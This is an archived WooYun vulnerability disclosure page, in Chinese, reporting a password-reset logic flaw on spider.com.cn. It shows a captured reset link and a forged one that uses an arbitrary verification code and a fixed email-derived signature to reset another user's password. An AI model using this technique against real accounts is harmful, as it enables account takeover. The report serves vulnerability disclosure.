当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111950

漏洞标题:蜘蛛网重置任意用户密码#3

相关厂商:spider.com.cn

漏洞作者: 外星人

提交时间:2015-05-04 16:40

修复时间:2015-05-09 16:42

公开时间:2015-05-09 16:42

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-04: 细节已通知厂商并且等待厂商处理中
2015-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

感谢CCTV赞助商采访
感谢WOOYUN大力支持
本漏洞由蜘蛛网全程赞助 独家冠名播出

详细说明:

蜘蛛网重置共5发。
前2次重置都以手机为例, 这次研究下邮箱。 收到如下链接
http://www.spider.com.cn/forgetPasswordStepThree.html?forgettype=email&verifycode=560236&spsign=826FEA5B9EC7DDEEF7A4596423C462BDC6446B0AA8CED081&sign=15431BCC4B0F7C31E0742FC72DE46F3928D20A07DE91CC3767049198F0818D3FF877D2D39083FA845D40908365E76E88
经过七七四九天的磨练, sign 是固定的,是邮箱加密, 有用信息就是这么多, 前面那6位数字,和数字后面那段,不知道是什么鬼东西, 都是装饰
现在找了个邮箱xjh22222228@163.com 就用这个示范
构造链接如下
http://www.spider.com.cn/forgetPasswordStepThree.html?forgettype=email&verifycode=111111&spsign=826FEA5B9EC7DDEEF7A4596423C462BDC6446B0AA8CED081&sign=74D3E2DA8132404D5485B918CABAA10851B1F2B79E0E14F5D70CE4B363ED710BD17AAFED3DB5B39F6D1C21FB547F93599F0BC118A451F187C1C029B2C3978A3F
看到上面链接, 和最上面的链接哪里不一样了没, code 都是随便填的 111111

漏洞证明:

首先要找回密码那 发送链接,不然不行,然后在将链接复制 粘贴 到地址栏里

1.png


2.png


3.png

修复方案:

礼物啊,我去去 去

版权声明:转载请注明来源 外星人@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-09 16:42

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-04 16:46 | 外星人 ( 普通白帽子 | Rank:650 漏洞数:139 )

    厂商是不是不打算活了